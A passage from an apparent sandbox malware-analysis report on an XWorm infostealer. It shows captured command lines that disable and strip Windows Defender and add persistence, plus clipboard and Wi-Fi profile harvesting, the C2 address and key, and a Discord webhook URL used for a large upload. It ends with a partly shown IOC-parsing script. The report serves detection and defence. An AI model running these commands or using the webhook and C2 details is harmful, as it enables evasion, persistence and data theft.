-DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 4940, ProcessName: cmd.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                        Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\program.exe, ProcessId: 2360, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr
                        Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\XClient.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\eternal.exe, ProcessId: 5604, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand
                        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\program.exe" , ParentImage: C:\Users\user\AppData\Roaming\program.exe, ParentProcessId: 2360, ParentProcessName: program.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7544, ProcessName: cmd.exe
                        Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\program.exe, ProcessId: 2360, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr
                        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\eternal.exe, ProcessId: 5604, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\eternal.exe" , ParentImage: C:\Users\user\AppData\Roaming\eternal.exe, ParentProcessId: 5604, ParentProcessName: eternal.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe", ProcessId: 4424, ProcessName: schtasks.exe
                        Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\program.exe, ProcessId: 2360, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo, CommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: consent.exe 6092 324 0000019985E22B80, ParentImage: C:\Windows\System32\consent.exe, ParentProcessId: 7816, ParentProcessName: consent.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo, ProcessId: 6092, ProcessName: svchost.exe
                        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7984, TargetFilename: C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4920, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe', ProcessId: 5520, ProcessName: powershell.exe

                        Data Obfuscation

                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

                        Stealing of Sensitive Information

                        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\program.exe" , ParentImage: C:\Users\user\AppData\Roaming\program.exe, ParentProcessId: 2360, ParentProcessName: program.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7620, ProcessName: cmd.exe

                        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                        2024-11-17T11:23:34.191338+0100 | 2853193 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49728 | 147.185.221.23 | 33942 | TCP

                        AV Detection

                        Source: EternalPredictor.exe, Avira: detected
                        Source: 00000000.00000002.1521249404.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Xworm {"C2 url": ["147.185.221.23"], "Port": 33942, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, ReversingLabs: Detection: 63%
                        Source: C:\Users\user\AppData\Roaming\XClient.exe, ReversingLabs: Detection: 73%
                        Source: C:\Users\user\AppData\Roaming\eternal.exe, ReversingLabs: Detection: 73%
                        Source: C:\Users\user\AppData\Roaming\program.exe, ReversingLabs: Detection: 44%
                        Source: C:\Users\user\AppData\Roaming\skuld.exe, ReversingLabs: Detection: 63%
                        Source: EternalPredictor.exe, Virustotal: Detection: 56%
                        Source: EternalPredictor.exe, ReversingLabs: Detection: 57%
                        Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.8% probability
                        Source: EternalPredictor.exe, Joe Sandbox ML: detected
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, String decryptor: 147.185.221.23
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, String decryptor: 33942
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, String decryptor: <123456789>
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, String decryptor: <Xwormmm>
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, String decryptor: Group1
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, String decryptor: USB.exe
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, String decryptor: %AppData%
                        Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, String decryptor: XClient.exe

                        Privilege Escalation

                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, Registry value created: NULL C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, Registry value created: DelegateExecute
                        Source: EternalPredictor.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: EternalPredictor.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: program.exe, 00000008.00000002.1949490443.00007FFBA4217000.00000040.00000001.01000000.0000001A.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: program.exe, 00000008.00000002.1950555246.00007FFBA65AA000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: eternal.exe, 00000002.00000002.3236463360.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: program.exe, 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmp
                        Source: Binary string: 8C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.pdb source: powershell.exe, 00000033.00000002.1693664914.000001F880386000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: .pdb/ source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: program.exe, 00000005.00000003.1516009158.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1955438323.00007FFBBB594000.00000002.00000001.01000000.0000000B.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: program.exe, 00000008.00000002.1950555246.00007FFBA6512000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: program.exe, 00000005.00000003.1516009158.00000139887DF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1955438323.00007FFBBB594000.00000002.00000001.01000000.0000000B.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: program.exe, program.exe, 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp
                        Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb/? source: eternal.exe, 00000002.00000002.3236463360.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: program.exe, program.exe, 00000008.00000002.1950555246.00007FFBA65AA000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: symbols\dll\mscorlib.pdbpdb` source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbf source: eternal.exe, 00000002.00000002.3236463360.000000001BF12000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdbl source: eternal.exe, 00000002.00000002.3236463360.000000001BF12000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: 0C:\Windows\mscorlib.pdb source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: program.exe, 00000008.00000002.1955863036.00007FFBBC341000.00000040.00000001.01000000.00000013.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: eternal.exe, 00000002.00000002.3236463360.000000001BE50000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: program.exe, 00000008.00000002.1954782727.00007FFBAB971000.00000040.00000001.01000000.0000000C.sdmp
                        Source: Binary string: mscorlib.pdb source: eternal.exe, 00000002.00000002.3236463360.000000001BF12000.00000004.00000020.00020000.00000000.sdmp, eternal.exe, 00000002.00000002.3236463360.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: program.exe, program.exe, 00000008.00000002.1949877226.00007FFBA43D1000.00000040.00000001.01000000.00000018.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: eternal.exe, 00000002.00000002.3236463360.000000001BF12000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: program.exe
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: program.exe, 00000008.00000002.1952893577.00007FFBAA4CB000.00000040.00000001.01000000.0000000E.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdbN0uP source: eternal.exe, 00000002.00000002.3236463360.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: program.exe, 00000008.00000002.1955626688.00007FFBBC151000.00000040.00000001.01000000.00000019.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: program.exe, 00000008.00000002.1952893577.00007FFBAA4CB000.00000040.00000001.01000000.0000000E.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: program.exe, 00000008.00000002.1955177805.00007FFBBAF31000.00000040.00000001.01000000.0000000F.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb63 source: eternal.exe, 00000002.00000002.3236463360.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: 8C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.pdbhP source: powershell.exe, 00000033.00000002.1693664914.000001F880386000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: program.exe, program.exe, 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: program.exe, 00000008.00000002.1954529831.00007FFBAB941000.00000040.00000001.01000000.00000010.sdmp
                        Source: Binary string: indoC:\Windows\mscorlib.pdb source: eternal.exe, 00000002.00000002.3239609657.000000001C289000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: program.exe, 00000008.00000002.1953128317.00007FFBAA8E8000.00000040.00000001.01000000.0000000A.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdb source: program.exe, program.exe, 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: program.exe, program.exe, 00000008.00000002.1951835790.00007FFBA66AE000.00000040.00000001.01000000.00000014.sdmp
                        Source: C:\Users\user\AppData\Roaming\program.exe, Code function: 5_2_00007FF72C659280 FindFirstFileExW,FindClose,5_2_00007FF72C659280
                        Source: C:\Users\user\AppData\Roaming\program.exe, Code function: 5_2_00007FF72C6583C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00007FF72C6583C0
                        Source: C:\Users\user\AppData\Roaming\program.exe, Code function: 5_2_00007FF72C671874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF72C671874
                        Source: C:\Users\user\AppData\Roaming\program.exe, Code function: 8_2_00007FF72C659280 FindFirstFileExW,FindClose,8_2_00007FF72C659280
                        Source: C:\Users\user\AppData\Roaming\program.exe, Code function: 8_2_00007FF72C671874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_00007FF72C671874
                        Source: C:\Users\user\AppData\Roaming\program.exe, Code function: 8_2_00007FF72C6583C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,8_2_00007FF72C6583C0
                        Source: C:\Users\user\AppData\Roaming\program.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                        Source: C:\Users\user\AppData\Roaming\program.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                        Source: C:\Users\user\AppData\Roaming\program.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                        Source: C:\Users\user\AppData\Roaming\program.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                        Source: C:\Users\user\AppData\Roaming\program.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                        Source: C:\Users\user\AppData\Roaming\program.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\

                        Networking

                        Source: Network traffic, Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49725 -> 147.185.221.23:33942
                        Source: Network traffic, Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49728 -> 147.185.221.23:33942
                        Source: Malware configuration extractor, URLs: 147.185.221.23
                        Source: global traffic, TCP traffic: 192.168.2.8:49709 -> 147.185.221.23:33942
                        Source: unknown, DNS query: name: api.ipify.org
                        Source: unknown, DNS query: name: ip-api.com
                        Source: unknown, TCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBAA49660C recv, 8_2_00007FFBAA49660C
                        Source: global traffic | HTTP traffic detected:
                            GET / HTTP/1.1
                            Host: api.ipify.org
                            User-Agent: Go-http-client/1.1
                            Accept-Encoding: gzip
                        Source: global traffic | HTTP traffic detected (2 requests):
                            GET /line/?fields=hosting HTTP/1.1
                            Host: ip-api.com
                            User-Agent: Go-http-client/1.1
                            Accept-Encoding: gzip
                        Source: global traffic | HTTP traffic detected:
                            GET /json/?fields=225545 HTTP/1.1
                            Host: ip-api.com
                            Accept-Encoding: identity
                            User-Agent: python-urllib3/2.2.3
                        Source: program.exe, 00000008.00000002.1939908324.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
                        Source: program.exe, 00000008.00000002.1939908324.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
                        Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
                        Source: global traffic | DNS traffic detected: DNS query: ip-api.com
                        Source: global traffic | DNS traffic detected: DNS query: discord.com
                        Source: unknown | HTTP traffic detected:
                            POST /api/webhooks/1298867906041479188/X0YmXSYYuFGsCIlZL1CQlv_GeIoIWc3S1cksX7_7_e4Onj-TjaVqNzNpf_yEZ3AJvNBM HTTP/1.1
                            Host: discord.com
                            Accept-Encoding: identity
                            Content-Length: 502440
                            User-Agent: python-urllib3/2.2.3
                            Content-Type: multipart/form-data; boundary=6672d82bd038a7446290ef714c16a718
                        Source: global traffic | HTTP traffic detected:
                            HTTP/1.1 404 Not Found
                            Date: Sun, 17 Nov 2024 10:22:01 GMT
                            Content-Type: application/json
                            Content-Length: 45
                            Connection: close
                            Cache-Control: public, max-age=3600, s-maxage=3600
                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                            x-ratelimit-limit: 5
                            x-ratelimit-remaining: 4
                            x-ratelimit-reset: 1731838922
                            x-ratelimit-reset-after: 1
                            via: 1.1 google
                            alt-svc: h3=":443"; ma=86400
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kAafSwTRG6Fa%2FRJMOc3VGX0BCuXUtuULCwhFeDvjsJPZAKtziv3qP5ItX77L8Jqhu6pfvcjLVPS5rCQSNjrBh6haKFe%2BMITwUEfsxI6na0mnEuRFO4eXHDTPXwff"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            X-Content-Type-Options: nosniff
                            Set-Cookie: __cfruid=daade001e76c5346a9107562c463e493fd63bfc9-1731838921; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                            Set-Cookie: _cfuvid=ycNd0d26ksQwnFyG4f9aiNkPKG6_UonCz4_PyaZrPZI-1731838921537-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                            Server: cloudflare
                            CF-RAY: 8e3eff479fd14623-DFW
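The network rows above are the raw material an analyst turns into block lists and hunting queries: public-IP lookups against api.ipify.org and ip-api.com (the `fields=hosting` request is what the report's "Check if machine is in data center or colocation facility" signature refers to), repeated TCP traffic to 147.185.221.23 with no preceding DNS resolution, and a 502440-byte multipart POST to a discord.com webhook. The script below is an added example for this page, not Joe Sandbox code and not part of the analysed sample. It parses rows in the sandbox's one-line text form (where the source and the observation run together and HTTP headers are concatenated) into a deduplicated, defanged IOC set and tags the behaviours just listed. The input rows are constructed to mirror the ones above with the webhook token replaced by a placeholder and an invented multipart boundary; the tag names and the size threshold for a "large" POST body are this example's own choices.

```python
"""Turn Joe Sandbox-style network rows into a deduplicated, defanged IOC set.

Added example for this report; not Joe Sandbox code and not part of the sample.
Handles the sandbox's run-together one-line text as well as one-header-per-line text.
"""
import re
from collections import Counter
from dataclasses import dataclass, field

# Constructed input modelled on the rows in this report. The webhook token is a
# placeholder, not the captured one, and the multipart boundary is invented.
SAMPLE_ROWS = [
    "Source: unknownDNS query: name: api.ipify.org",
    "Source: unknownDNS query: name: api.ipify.org",
    "Source: unknownDNS query: name: ip-api.com",
    "Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23",
    "Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23",
    r"Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA49660C recv,8_2_00007FFBAA49660C",
    "Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org"
    "User-Agent: Go-http-client/1.1Accept-Encoding: gzip",
    "Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.com"
    "User-Agent: Go-http-client/1.1Accept-Encoding: gzip",
    "Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com"
    "Accept-Encoding: identityUser-Agent: python-urllib3/2.2.3",
    "Source: unknownHTTP traffic detected: POST /api/webhooks/1298867906041479188/PLACEHOLDER_TOKEN HTTP/1.1"
    "Host: discord.comAccept-Encoding: identityContent-Length: 502440User-Agent: python-urllib3/2.2.3"
    "Content-Type: multipart/form-data; boundary=0123456789abcdef",
    "Source: global trafficDNS traffic detected: DNS query: discord.com",
]

# Header names the sandbox text runs together. They are the stop condition for the
# lazy Host / User-Agent captures, so "ip-api.comUser-Agent: ..." splits correctly.
HEADERS = r"(?:Host|User-Agent|Accept-Encoding|Content-Length|Content-Type|Connection)"
NO_DNS_RE = re.compile(r"without corresponding DNS query: (\d{1,3}(?:\.\d{1,3}){3})")
DNS_RE = re.compile(r"DNS query: (?:name: )?([A-Za-z0-9.-]+)")
REQ_RE = re.compile(r"HTTP traffic detected: (GET|POST|PUT|HEAD) (\S+) HTTP/1\.[01]")
HOST_RE = re.compile(rf"Host: (.*?)(?={HEADERS}: |$)", re.M)
UA_RE = re.compile(rf"User-Agent: (.*?)(?={HEADERS}: |$)", re.M)
CL_RE = re.compile(r"Content-Length: (\d+)")
LARGE_BODY = 100_000  # bytes; example threshold for flagging an upload-sized POST


@dataclass
class IocReport:
    domains: set = field(default_factory=set)
    direct_ips: Counter = field(default_factory=Counter)  # IP -> times seen without DNS
    requests: list = field(default_factory=list)           # (method, host, path, user_agent)
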